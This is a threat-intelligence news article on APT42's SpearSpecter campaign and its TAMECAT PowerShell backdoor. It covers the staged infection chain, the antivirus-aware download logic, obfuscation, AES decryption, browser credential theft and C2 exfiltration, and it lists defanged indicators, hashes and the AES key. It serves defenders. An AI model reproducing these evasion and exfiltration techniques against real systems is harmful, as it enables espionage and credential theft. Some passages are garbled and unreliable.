High-ranking government and defense officials have been the target of a new, sophisticated espionage campaign known as "SpearSpecter," which has been seen using the TAMECAT backdoor This article explores tamecat intended covert. . The campaign, which is credited to the Iranian state-sponsored organization APT42, uses sophisticated social engineering to deliver a modular PowerShell-based implant that steals private login credentials from Google Chrome and Microsoft Edge.

Specifics of TAMECAT's capabilities. (Source: pulsedive) Recent analysis by the Israel National Digital Agency (INDA) reveals that APT42 operators build extensive rapport with victims, often posing as journalists or conference organizers before delivering the malicious payload. domains that the National Defense Agency of Israel monitors. (Source:pulsedive) After installation, TAMECAT offers persistent access, enabling hackers to take screenshots, run arbitrary commands, and steal browser data through secret channels like Telegram and Glitch.

Malware Analysis and the Infection Chain A VBScript file that conducts environmental checks to identify the best execution path is where the infection starts. Pulsedive observed that the script queries installed antivirus programs using WMI; if "Windows" appears in the antivirus list, it uses conhost to initiate a PowerShell command. This command uses wget to retrieve the second-stage loader, a file called nconf.txt, from the hosting service tebi.io.

The script automatically uses cmd.exe and curl to download a secondary payload if the particular antivirus condition is not satisfied. According to this reasoning, the malware tries to avoid certain security products while blending in with common system administration tools. AES-encrypted blocks are contained in the heavily obfuscated PowerShell script known as the core loader (nconf.txt).

The sample (SHA256: bd1f0fb0...) defines multiple helper functions for decryption in addition to two main variables, $te12 and $k12ey. The script uses a Base64-encoded URL inside the code to retrieve the subsequent step. To avoid detection by static analysis, the first three bytes of the string are dropped before decoding.

After that, a bitwise NOT operation is used to modify the retrieved content (df32s.txt) and transform it into a UTF-8 string. Content decoded (Source: pulsedive) This reveals the Borjol function, which unlocks the final TAMECAT payload using an AES decryptor and a 256-bit key (kNz0CXiP0wEQnhZXYbvraigXvRVYHk1B). With particular modules aimed at browser environments, TAMECAT is intended for covert data theft. The malware connects to its Command and Control (C2) server and creates a directory in %LocalAppData%\Chrome.

In the analyzed sample, the C2 was hosted on the glitch.me platform at hxxps://accurate-sprout-porpoise[.]glitch[.]me. The malware creates a unique victim token that is saved in config.txt after gathering system data, such as the OS version and computer name. Borpos AES is used to encrypt this data, and POST requests are used to exfiltrate it.

Additionally, the script transmits the initialization vector (IV) for the encrypted traffic via a custom header called Content-DPR. PowerShell/C# Execution: Using the $Language parameter to run any code. Browser manipulation involves stopping Chrome processes or turning on remote debugging in Edge in order to steal passwords and cookies. Screen Capture: Taking screenshots of the victim’s desktop for surveillance.

Compromise Type Value Indicators URL hxxps[:]//s3[.]tebi[.]io/icestorage/config/nconf[. ]txt URL hxxps[:]//s3[.]tebi[.]io/icestorage/df32s[. ]txt C2 Domain hxxps[:]//accurate-sprout-porpoise[.]glitch[.

]me SHA256 5404e39f2f175a0fc993513ee52be3679a64c69c79e32caa656fbb7645965422 (VBS) SHA256 bd1f0fb085c486e97d82b6e8acb3977497c59c3ac79f973f96c395e7f0ca97f8 (PS1) AES Key kNz0CXiP0wEQnhZXYbvraigXvRVYHk1B MITRE ATT&CK TTPs Tactic Technique ID Command and Control Web Protocols T1071.001 Symmetric Cryptography T1573.001 Ingress Encrypted Channel Tool Transfer T1105 Defense Evasion Deobfuscate/Decode Files or Information T1140 Obfuscated Files or Information T1027.013 Discovery Security Software Discovery T1518.001 System Information Discovery T1082 Execution PowerShell T1059.001 Instrumentation for Windows Management T1047 Exfiltration Exfiltration Over C2 Channel T1041 To lessen this risk, organizations are advised to limit PowerShell execution to signed scripts and keep an eye out for unusual processes created by wscript.exe or cscript.exe.